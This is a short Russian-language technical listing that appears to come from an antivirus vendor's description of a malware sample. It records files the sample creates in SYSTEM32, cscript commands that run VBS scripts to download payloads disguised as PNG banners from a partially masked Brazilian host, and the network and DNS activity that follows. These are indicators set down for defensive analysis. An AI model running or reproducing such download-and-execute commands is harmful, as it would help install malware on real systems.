Техническая информация
- <SYSTEM32>\wmpupdt.exe (загружен из сети Интернет)
- <SYSTEM32>\cscript.exe fcfeea.vbs http://www.pt##.org.br/banner4.png <SYSTEM32>\wmplugin.rgb
- <SYSTEM32>\cscript.exe ddebab.vbs http://www.pt##.org.br/banner3.png <SYSTEM32>\wmpupdt.exe
- <SYSTEM32>\wmpupdt.exe
- <SYSTEM32>\wmplugin.rgb
- <Текущая директория>\ddebab.vbs
- <Текущая директория>\fcfeea.vbs
- <Текущая директория>\ddebab.vbs
- <Текущая директория>\fcfeea.vbs
- 'www.pt##.org.br':80
- www.pt##.org.br/banner4.png
- www.pt##.org.br/banner3.png
- DNS ASK www.pt##.org.br
- ClassName: 'Shell_TrayWnd' WindowName: ''